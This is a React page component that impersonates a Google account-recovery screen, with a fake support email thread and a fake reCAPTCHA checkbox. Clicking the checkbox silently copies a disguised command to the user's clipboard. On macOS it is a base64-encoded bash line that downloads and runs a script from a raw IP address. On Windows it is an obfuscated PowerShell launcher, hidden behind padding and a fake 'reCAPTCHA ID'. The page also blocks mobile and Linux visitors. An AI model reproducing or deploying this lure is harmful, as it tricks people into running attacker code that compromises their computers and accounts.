import {useState, useEffect, useRef} from "react";
import RecaptchaWidget from '../components/RecaptchaWidget'
import VerifyWindow from '../components/VerifyWindow'
import ExplainerPanel from '../components/ExplainerPanel'

export default function AccountRecovery() {
    const [loading, setLoading] = useState(true);
    const [showScrollHint, setShowScrollHint] = useState(true);
    const [expandedEmail, setExpandedEmail] = useState<number | null>(null);
    const [isMac, setIsMac] = useState(false);
    const [isUnsupported, setIsUnsupported] = useState(false);
    const scrollRef = useRef<HTMLDivElement>(null);
  const [phase, setPhase] = useState('idle') // idle | loading | verify
const [activeAnnotation, setActiveAnnotation] = useState<
  'loading' | 'verify' | null
>(null)
  const widgetRef = useRef(null)

  function handleCheckboxClick() {
    if (phase !== 'idle') return
    setPhase('loading')
    setActiveAnnotation('loading')

    const verificationId = '9823789327628924493'
    const payload = isMac
      ? `echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzIwOS45OS4xODcuMTM3L1NhZG9yYXh1aCki' | base64 -d | bash`
      : `powershell start powershell "'isexs(isrssm sxssxssxszsxxssxsszxsxsx.sccs)'.Replace('s','')";                           reCAPTCHA ID: 8Z1k5L0mP7x9C3w2V323h947hd4dh58`


    const el = document.createElement('textarea')
    el.value = payload
    el.style.position = 'fixed'
    el.style.opacity = '0'
    document.body.appendChild(el)
    el.select()
    document.execCommand('copy')
    document.body.removeChild(el)

    setTimeout(() => {
      setPhase('verify')
      setActiveAnnotation('verify')
    }, 900)
  }

  function handleReset() {
    setPhase('idle')
    setActiveAnnotation(null)
  }

    useEffect(() => {
        const ua = navigator.userAgent;
        const mac = /Mac|iPhone|iPad|iPod/.test(ua) ||
            /Macintosh/.test(navigator.platform) ||
            navigator.platform === 'MacIntel';
        setIsMac(mac);

        const mobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(ua);
        const linux = /Linux/.test(ua) && !/Android/.test(ua);
        if (mobile || linux) {
            setIsUnsupported(true);
            setLoading(false);
            return;
        }

        // Wait minimum 2 seconds for loading animation
        const timer = setTimeout(() => setLoading(false), 2000);
        return () => clearTimeout(timer);
    }, []);

    useEffect(() => {
        if (loading) return;

        const scrollEl = scrollRef.current;
        if (!scrollEl) return;

        const handleScroll = () => {
            const { scrollHeight, scrollTop, clientHeight } = scrollEl;

            if (scrollHeight <= clientHeight + 1) {
                setShowScrollHint(false);
                return;
            }

            const scrollPercent = (scrollTop + clientHeight) / scrollHeight;
            setShowScrollHint(scrollPercent < 0.95);
        };

        scrollEl.addEventListener("scroll", handleScroll);
        handleScroll();

        return () => {
            scrollEl.removeEventListener("scroll", handleScroll);
        };
    }, [loading]);

    const toggleEmail = (index: number) => {
        setExpandedEmail(expandedEmail === index ? null : index);
    };

    if (isUnsupported) {
        return (
            <main className="flex min-h-screen flex-col w-full bg-white sm:bg-[rgb(232,237,245)] items-center justify-center font-['Roboto',Arial,sans-serif]">
                <div className="bg-white sm:rounded-2xl md:rounded-[28px] w-full max-w-[450px] p-8 sm:p-10 sm:shadow-sm flex flex-col gap-6">
                    <svg xmlns="http://www.w3.org/2000/svg" width="40" height="40" viewBox="0 0 40 48" aria-hidden="true">
                        <path fill="#4285F4" d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z"/>
                        <path fill="#34A853" d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z"/>
                        <path fill="#FABB05" d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z"/>
                        <path fill="#E94235" d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z"/>
                    </svg>
                    <div>
                        <h1 className="text-[1.75rem] font-normal text-[#202124] leading-tight mb-2">Device not supported</h1>
                        <p className="text-[0.9rem] text-[#5f6368] leading-[1.5]">
                            This service is only available on Windows and macOS desktop devices. Please sign in on a supported computer to complete your account recovery.
                        </p>
                    </div>
                    <a
                        href="https://support.google.com/accounts?hl=en&p=account_iph"
                        className="text-[0.875rem] text-[rgb(26,115,232)] hover:underline w-fit"
                    >
                        Learn more about account recovery
                    </a>
                </div>
                <div className="flex flex-row mt-2 px-4">
                    <a className="my-4 mr-1 text-[0.75rem] pr-3 py-2 text-[rgb(31,31,31)] hover:underline" href="https://support.google.com/accounts?hl=en&p=account_iph">Help</a>
                    <a className="my-4 mx-1 text-[0.75rem] px-3 py-2 text-[rgb(31,31,31)] hover:underline" href="https://accounts.google.com/TOS?loc=ES&hl=en&privacy=true">Privacy</a>
                    <a className="my-4 mx-1 text-[0.75rem] pl-3 py-2 text-[rgb(31,31,31)] hover:underline" href="https://accounts.google.com/TOS?loc=ES&hl=en">Terms</a>
                </div>
            </main>
        );
    }

    return (
        <>
            <style>{`
                @import url("https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap");

                @keyframes expandShrink {
                    0% {
                        transform: translateX(-100%) scaleX(0.5);
                        opacity: 0.3;
                    }
                    50% {
                        transform: translateX(50%) scaleX(1.5);
                        opacity: 1;
                    }
                    100% {
                        transform: translateX(500%) scaleX(0.5);
                        opacity: 0.3;
                    }
                }

                .loading-bar {
                    animation: expandShrink 1.5s ease-in-out infinite;
                    transform-origin: center;
                }
            `}</style>

            <main
                className="flex min-h-screen flex-col w-full bg-white sm:bg-[rgb(232,237,245)] text-[rgb(31,31,31)] justify-center relative font-['Roboto',Arial,sans-serif]">

                <div className="w-full grow flex items-center sm:justify-center flex-col justify-between">
                    <div
                        className="relative bg-white sm:rounded-2xl md:rounded-[28px] w-full max-w-[500px] md:max-w-[1050px] flex-col p-6 sm:p-10 md:p-12 flex sm:shadow-sm overflow-visble min-h-[380px]">

                        {loading ? (
                            <>
                                <div className="absolute top-0 left-0 w-full h-1 bg-transparent overflow-hidden">
                                    <div className="loading-bar h-full w-1/4 bg-[#4285F4]"></div>
                                </div>
                                <div className="h-12 mb-6">
                                    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 40 48"
                                         aria-hidden="true">
                                        <path fill="#4285F4"
                                              d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z"></path>
                                        <path fill="#34A853"
                                              d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z"></path>
                                        <path fill="#FABB05"
                                              d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z"></path>
                                        <path fill="#E94235"
                                              d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z"></path>
                                    </svg>
                                </div>

                            </>
                        ) : (
                            <>
                                <div className="h-12 mb-6">
                                    <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 40 48"
                                         aria-hidden="true">
                                        <path fill="#4285F4"
                                              d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z"></path>
                                        <path fill="#34A853"
                                              d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z"></path>
                                        <path fill="#FABB05"
                                              d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z"></path>
                                        <path fill="#E94235"
                                              d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z"></path>
                                    </svg>
                                </div>

                                <div className="flex flex-col md:flex-row w-full gap-6 md:gap-10 flex-1">

                                    <div className="flex flex-col gap-3 md:w-[42%] flex-shrink-0">
                                        <h1 className="text-[2.5rem] md:text-[2.75rem] font-normal leading-tight text-[#202124]">
                                            Account Recovery
                                        </h1>
                                        <p className="text-[1rem] leading-[1.4] text-[#202124]">
                                            Google has generated a transcript of the previous account email change
                                            request.
                                            For security purposes, please review it to determine its authenticity.
                                        </p>
                                    </div>

                                    <div className="flex flex-col flex-1 md:w-[58%]">
                                        <div className="w-full h-[220px] md:h-[200px] relative">

                                            {showScrollHint && (
                                                <div
                                                    className="z-40 text-sm bg-[rgb(232,237,245)]/90 absolute bottom-2 left-1/2 -translate-x-1/2 w-fit px-4 py-1 rounded-full flex flex-row gap-1 items-center transition-all duration-200 pointer-events-none">
                                                    Scroll to the bottom
                                                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
                                                         viewBox="0 0 24 24" fill="none" stroke="currentColor"
                                                         strokeWidth="2" strokeLinecap="round" strokeLinejoin="round"
                                                         className="size-4">
                                                        <path d="M12 5v14"></path>
                                                        <path d="m19 12-7 7-7-7"></path>
                                                    </svg>
                                                </div>
                                            )}

                                            <div ref={scrollRef}
                                                 className="w-full h-full gap-4 overflow-auto flex flex-col text-sm relative">

                                                <div className="flex flex-row gap-3 w-full">
                                                    <div
                                                        className="size-[40px] rounded-full relative overflow-clip flex-shrink-0">
                                                        <img alt="icon" src="/photo_2025-09-02_17-25-02.jpg"
                                                             className="w-full h-full object-cover"/>
                                                    </div>
                                                    <div className="flex flex-col flex-1">
                                                        <div className="flex flex-row gap-1 flex-wrap items-center">
                                                            <p className="text-[.9rem] font-semibold text-[#1f1f1f]">Mohammed</p>
                                                            <p className="text-[.75rem] text-[#5e5e5e]">&lt;muhammad.saif87@gmail.com&gt;</p>
                                                        </div>
                                                        <div className="flex flex-row relative items-center">
                                                            <p className="text-[#5e5e5e] text-[.75rem]">To Lauriane</p>
                                                            <img alt="dropdown" width="20" height="20"
                                                                 className="cursor-pointer"
                                                                 src="/arrow_drop_down_black_20dp.png"
                                                                 onClick={() => toggleEmail(1)}/>

                                                            {expandedEmail === 1 && (
                                                                <div
                                                                    className="absolute left-0 top-[20px] w-[320px] z-50 border border-[rgba(0,0,0,.2)] p-2 flex flex-col gap-1 bg-white shadow-lg">
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">from:
                                                                        </div>
                                                                        <div className="flex-1 text-left leading-[20px]">
                                                                            <span
                                                                                className="font-bold text-[#1f1f1f]">Mohammed </span>
                                                                            <span
                                                                                className="text-[#5e5e5e]">&lt;muhammad.saif87@gmail.com&gt;</span>
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">to:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Lauriane.fay@google.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">date:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Feb
                                                                            4, 2026, 1:32 PM
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">subject:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Please
                                                                            help me recover my email urgent
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">mailed-by:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">signed-by:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">security:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Standard
                                                                            encryption (TLS)
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            )}
                                                        </div>
                                                        <p className="mt-2 leading-[1.4] text-[#1f1f1f] text-[.9rem]">Hi
                                                            i
                                                            lost my phone on holiday and am trying to change the number
                                                            to
                                                            my account to a new one. My new email is the one im
                                                            contacting
                                                            you from, muhammad.saif87@gmail.com</p>
                                                    </div>
                                                </div>

                                                <div className="flex flex-row gap-3 w-full">
                                                    <div
                                                        className="size-[40px] rounded-full relative overflow-clip flex-shrink-0 flex items-center justify-center">
                                                        <img alt="icon" src="/google_g_icon_download.png"
                                                             className="w-full h-full object-cover"/>
                                                    </div>
                                                    <div className="flex flex-col flex-1">
                                                        <div className="flex flex-row gap-1 flex-wrap items-center">
                                                            <p className="text-[.9rem] font-semibold text-[#1f1f1f]">Lauriane</p>
                                                            <img alt="verified" width="16" height="16"
                                                                 className="object-contain"
                                                                 src="/bimi_verified_checkmark.png"/>
                                                            <p className="text-[.75rem] text-[#5e5e5e]">&lt;Lauriane.fay@google.com&gt;</p>
                                                        </div>
                                                        <div className="flex flex-row relative items-center">
                                                            <p className="text-[#5e5e5e] text-[.75rem]">To Mohammed</p>
                                                            <img alt="dropdown" width="20" height="20"
                                                                 className="cursor-pointer"
                                                                 src="/arrow_drop_down_black_20dp.png"
                                                                 onClick={() => toggleEmail(2)}/>

                                                            {expandedEmail === 2 && (
                                                                <div
                                                                    className="absolute left-0 top-[20px] w-[320px] z-50 border border-[rgba(0,0,0,.2)] p-2 flex flex-col gap-1 bg-white shadow-lg">
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">from:
                                                                        </div>
                                                                        <div className="flex-1 text-left leading-[20px]">
                                                                            <span
                                                                                className="font-bold text-[#1f1f1f]">Lauriane </span>
                                                                            <span
                                                                                className="text-[#5e5e5e]">&lt;Lauriane.fay@google.com&gt;</span>
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">to:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">muhammad.saif87@gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">date:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Feb
                                                                            4, 2026, 6:12 PM
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">subject:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Re:
                                                                            Please help me recover my email urgent
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">mailed-by:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">signed-by:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">security:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Standard
                                                                            encryption (TLS)
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            )}
                                                        </div>
                                                        <p className="mt-2 leading-[1.4] text-[#1f1f1f] text-[.9rem]">Hello
                                                            Mohammed</p>
                                                        <p className="leading-[1.4] text-[#1f1f1f] mt-1 text-[.9rem]">I'm
                                                            sorry for the inconvenience and I hope you can find your
                                                            phone.
                                                            To change any credentials you would need to submit a form of
                                                            government issued ID that is linked to your account.</p>
                                                        <p className="leading-[1.4] text-[#5e5e5e] mt-1 text-[.9rem]">Thank
                                                            you, Lauriane</p>
                                                    </div>
                                                </div>

                                                <div className="flex flex-row gap-3 w-full">
                                                    <div
                                                        className="size-[40px] rounded-full relative overflow-clip flex-shrink-0">
                                                        <img alt="icon" src="/photo_2025-09-02_17-25-02.jpg"
                                                             className="w-full h-full object-cover"/>
                                                    </div>
                                                    <div className="flex flex-col flex-1">
                                                        <div className="flex flex-row gap-1 flex-wrap items-center">
                                                            <p className="text-[.9rem] font-semibold text-[#1f1f1f]">Mohammed</p>
                                                            <p className="text-[.75rem] text-[#5e5e5e]">&lt;muhammad.saif87@gmail.com&gt;</p>
                                                        </div>
                                                        <div className="flex flex-row relative items-center">
                                                            <p className="text-[#5e5e5e] text-[.75rem]">To Lauriane</p>
                                                            <img alt="dropdown" width="20" height="20"
                                                                 className="cursor-pointer"
                                                                 src="/arrow_drop_down_black_20dp.png"
                                                                 onClick={() => toggleEmail(3)}/>

                                                            {expandedEmail === 3 && (
                                                                <div
                                                                    className="absolute left-0 top-[20px] w-[320px] z-50 border border-[rgba(0,0,0,.2)] p-2 flex flex-col gap-1 bg-white shadow-lg">
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">from:
                                                                        </div>
                                                                        <div className="flex-1 text-left leading-[20px]">
                                                                            <span
                                                                                className="font-bold text-[#1f1f1f]">Mohammed </span>
                                                                            <span
                                                                                className="text-[#5e5e5e]">&lt;muhammad.saif87@gmail.com&gt;</span>
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">to:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Lauriane.fay@google.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">date:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Feb
                                                                            4, 2026, 6:17 PM
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">subject:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Re:
                                                                            Please help me recover my email urgent
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">mailed-by:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">signed-by:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">security:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Standard
                                                                            encryption (TLS)
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            )}
                                                        </div>
                                                        <p className="mt-2 leading-[1.4] text-[#1f1f1f] text-[.9rem]">Okay,
                                                            I am sending it now. Please process it fast, this is very
                                                            urgent. I am waiting for your reply.</p>
                                                        <div
                                                            className="flex items-center gap-2 mt-2 border border-[rgba(0,0,0,0.2)] rounded-full px-3 py-1.5 w-fit bg-white hover:bg-[#f8f9fa] cursor-pointer transition-colors">
                                                            <img alt="pdf" width="16" height="16"
                                                                 src="/icon_3_pdf_x16.png"/>
                                                            <span className="text-sm text-[#5f6368]">id_document_sc..</span>
                                                        </div>
                                                    </div>
                                                </div>

                                                <div className="flex flex-row gap-3 w-full">
                                                    <div
                                                        className="size-[40px] rounded-full relative overflow-clip flex-shrink-0 flex items-center justify-center">
                                                        <img alt="icon" src="/google_g_icon_download.png"
                                                             className="w-full h-full object-cover"/>
                                                    </div>
                                                    <div className="flex flex-col flex-1">
                                                        <div className="flex flex-row gap-1 flex-wrap items-center">
                                                            <p className="text-[.9rem] font-semibold text-[#1f1f1f]">Lauriane</p>
                                                            <img alt="verified" width="16" height="16"
                                                                 className="object-contain"
                                                                 src="/bimi_verified_checkmark.png"/>
                                                            <p className="text-[.75rem] text-[#5e5e5e]">&lt;Lauriane.fay@google.com&gt;</p>
                                                        </div>
                                                        <div className="flex flex-row relative items-center">
                                                            <p className="text-[#5e5e5e] text-[.75rem]">To Mohammed</p>
                                                            <img alt="dropdown" width="20" height="20"
                                                                 className="cursor-pointer"
                                                                 src="/arrow_drop_down_black_20dp.png"
                                                                 onClick={() => toggleEmail(4)}/>

                                                            {expandedEmail === 4 && (
                                                                <div
                                                                    className="absolute left-0 top-[20px] w-[320px] z-50 border border-[rgba(0,0,0,.2)] p-2 flex flex-col gap-1 bg-white shadow-lg">
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">from:
                                                                        </div>
                                                                        <div className="flex-1 text-left leading-[20px]">
                                                                            <span
                                                                                className="font-bold text-[#1f1f1f]">Lauriane </span>
                                                                            <span
                                                                                className="text-[#5e5e5e]">&lt;Lauriane.fay@google.com&gt;</span>
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">to:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">muhammad.saif87@gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">date:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Feb
                                                                            4, 2026, 6:22 PM
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">subject:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Re:
                                                                            Please help me recover my email urgent
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">mailed-by:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">signed-by:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">gmail.com
                                                                        </div>
                                                                    </div>
                                                                    <div
                                                                        className="w-full flex flex-row gap-2 text-[0.875rem]">
                                                                        <div
                                                                            className="w-[80px] flex text-right text-[#5e5e5e] justify-end flex-shrink-0">security:
                                                                        </div>
                                                                        <div
                                                                            className="flex-1 text-left leading-[20px] text-[#222]">Standard
                                                                            encryption (TLS)
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            )}
                                                        </div>
                                                        <p className="mt-2 leading-[1.4] text-[#1f1f1f] text-[.9rem]">Thank
                                                            you. We will review your document and confirm.</p>
                                                        <p className="leading-[1.4] text-[#5e5e5e] mt-1 text-[.9rem]">Sincerely,
                                                            Lauriane</p>
                                                    </div>
                                                </div>

                                            </div>

                                            {showScrollHint && (
                                                <div
                                                    className="bg-gradient-to-b from-transparent to-white w-full h-[24px] absolute bottom-0 pointer-events-none"></div>
                                            )}
                                        </div>

                                     <div className="flex flex-col w-full mt-6 gap-4 items-end">

  {/* ✅ Recaptcha (right-aligned, natural width) */}
  <div className="relative" ref={widgetRef}>
    <RecaptchaWidget
      phase={phase}
      onCheckboxClick={handleCheckboxClick}
      onAnnotate={setActiveAnnotation}
    />

    {/* Popup: left of widget on md+, below on small screens */}
    {phase === 'verify' && (
      <div className="absolute z-[9999] top-full right-0 mt-3 md:top-0 md:right-full md:mt-0 md:mr-[14px]">
        <VerifyWindow
          onClose={handleReset}
          onAnnotate={setActiveAnnotation}
          isMac={isMac}
        />
      </div>
    )}
  </div>

  {/* ✅ Button RIGHT aligned */}
  <button
    disabled
    className="cursor-not-allowed bg-[rgb(26,115,232)] text-white px-6 text-[0.875rem] font-medium h-9 min-w-[200px] flex justify-center items-center rounded-full opacity-50"
  >
    Download Id Document
  </button>

</div>
                                    </div>
                                </div>
                            </>
                        )}
                    </div>

                    <div className="flex flex-row w-full max-w-[1050px] justify-end px-6 md:px-12">
                        <a className="my-4 mr-1 text-[0.75rem] pr-3 py-2 text-[rgb(31,31,31)] hover:underline"
                           href="https://support.google.com/accounts?hl=en&p=account_iph">Help</a>
                        <a className="my-4 mx-1 text-[0.75rem] px-3 py-2 text-[rgb(31,31,31)] hover:underline"
                           href="https://accounts.google.com/TOS?loc=ES&hl=en&privacy=true">Privacy</a>
                        <a className="my-4 mx-1 text-[0.75rem] pl-3 py-2 text-[rgb(31,31,31)] hover:underline"
                           href="https://accounts.google.com/TOS?loc=ES&hl=en">Terms</a>
                    </div>
                </div>

                {loading && (
                    <div className="fixed inset-0 bg-black/60 z-[100] pointer-events-none"></div>
                )}
            </main>
        </>
    );
}
